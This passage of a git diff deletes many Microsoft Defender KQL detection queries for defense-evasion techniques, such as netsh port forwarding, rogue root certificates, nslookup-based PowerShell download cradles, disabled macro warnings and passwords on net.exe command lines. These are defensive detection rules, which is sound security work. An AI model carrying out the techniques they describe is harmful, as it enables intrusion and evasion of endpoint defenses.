-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"
\ No newline at end of file
diff --git a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index bde86a78..00000000
--- a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql b/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql
deleted file mode 100644
index c6f79160..00000000
--- a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/13
-// Level: low
-// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql
deleted file mode 100644
index 4cc604ab..00000000
--- a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023/03/05
-// Level: medium
-// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql
deleted file mode 100644
index 39fd1adb..00000000
--- a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023/03/05
-// Level: medium
-// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Node_Process_Executions.kql b/Defense Evasion/Node_Process_Executions.kql
deleted file mode 100644
index 317037be..00000000
--- a/Defense Evasion/Node_Process_Executions.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/04/06
-// Level: medium
-// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
-// Tags: attack.defense_evasion, attack.t1127, attack.t1059.007
-DeviceProcessEvents
-| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js"))
\ No newline at end of file
diff --git a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql b/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql
deleted file mode 100644
index 80c08589..00000000
--- a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
-// Date: 2020/10/05
-// Level: high
-// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and ProcessIntegrityLevel =~ "Medium")
\ No newline at end of file
diff --git a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql b/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql
deleted file mode 100644
index b0dfafe0..00000000
--- a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/05
-// Level: medium
-// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe")
\ No newline at end of file
diff --git a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql b/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql
deleted file mode 100644
index 97bb7aff..00000000
--- a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/05
-// Level: high
-// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\"
\ No newline at end of file
diff --git a/Defense Evasion/OceanLotus_Registry_Activity.kql b/Defense Evasion/OceanLotus_Registry_Activity.kql
deleted file mode 100644
index af20c10a..00000000
--- a/Defense Evasion/OceanLotus_Registry_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: megan201296, Jonhnathan Ribeiro
-// Date: 2019/04/14
-// Level: critical
-// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey contains "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a" or RegistryKey contains "Classes\\AppX3bbba44c6cae4d9695755183472171e2" or RegistryKey contains "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey contains "\\SOFTWARE\\App" and ((RegistryKey contains "AppXbf13d4ea2945444d8b13e2121cb6b663" or RegistryKey contains "AppX70162486c7554f7f80f481985d67586d" or RegistryKey contains "AppX37cc7fdccd644b4f85f4b22d5a3f105a") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon")))
\ No newline at end of file
diff --git a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql b/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql
deleted file mode 100644
index 6707a71e..00000000
--- a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: high
-// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Office_Macros_Warning_Disabled.kql b/Defense Evasion/Office_Macros_Warning_Disabled.kql
deleted file mode 100644
index e452118e..00000000
--- a/Defense Evasion/Office_Macros_Warning_Disabled.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings"
\ No newline at end of file
diff --git a/Defense Evasion/OilRig_APT_Registry_Persistence.kql b/Defense Evasion/OilRig_APT_Registry_Persistence.kql
deleted file mode 100644
index 83beccff..00000000
--- a/Defense Evasion/OilRig_APT_Registry_Persistence.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2018/03/23
-// Level: critical
-// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
-// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql
deleted file mode 100644
index 3ec39e0a..00000000
--- a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql b/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql
deleted file mode 100644
index 5a82e930..00000000
--- a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
-// Date: 2019/10/12
-// Level: high
-// Description: The OpenWith.exe executes other binary
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql b/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql
deleted file mode 100644
index 4dd5005e..00000000
--- a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects a network connection initiated by Cmstp.EXE
-Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
-
-// Tags: attack.defense_evasion, attack.t1218.003
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
deleted file mode 100644
index 88e21026..00000000
--- a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2023/04/28
-// Level: medium
-// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
-// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql b/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql
deleted file mode 100644
index 925798e2..00000000
--- a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql b/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 744c3788..00000000
--- a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where FolderPath contains "__PSScriptPolicyTest_" and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Execution.kql
deleted file mode 100644
index 4e6050fc..00000000
--- a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql
deleted file mode 100644
index c00dd12f..00000000
--- a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: high
-// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_CleanWipe_Execution.kql b/Defense Evasion/PUA_-_CleanWipe_Execution.kql
deleted file mode 100644
index 3da29794..00000000
--- a/Defense Evasion/PUA_-_CleanWipe_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: high
-// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe")
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql b/Defense Evasion/PUA_-_DefenderCheck_Execution.kql
deleted file mode 100644
index d05b1bb7..00000000
--- a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
-// Tags: attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck"
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql b/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql
deleted file mode 100644
index 5d350006..00000000
--- a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Micah Babinski
-// Date: 2022/12/11
-// Level: medium
-// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
-// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit")
\ No newline at end of file
diff --git a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql b/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql
deleted file mode 100644
index 65b83f51..00000000
--- a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder
-// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql b/Defense Evasion/Persistence_Via_New_SIP_Provider.kql
deleted file mode 100644
index 08cf0096..00000000
--- a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll"))))
\ No newline at end of file
diff --git a/Defense Evasion/Ping_Hex_IP.kql b/Defense Evasion/Ping_Hex_IP.kql
deleted file mode 100644
index 5d98cb81..00000000
--- a/Defense Evasion/Ping_Hex_IP.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/23
-// Level: high
-// Description: Detects a ping command that uses a hex encoded IP address
-// Tags: attack.defense_evasion, attack.t1140, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "0x" and FolderPath endswith "\\ping.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
deleted file mode 100644
index 8867fa02..00000000
--- a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_7za.DLL_Sideloading.kql b/Defense Evasion/Potential_7za.DLL_Sideloading.kql
deleted file mode 100644
index f1cc961b..00000000
--- a/Defense Evasion/Potential_7za.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/06/09
-// Level: low
-// Description: Detects potential DLL sideloading of "7za.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql b/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql
deleted file mode 100644
index 2ac0c70c..00000000
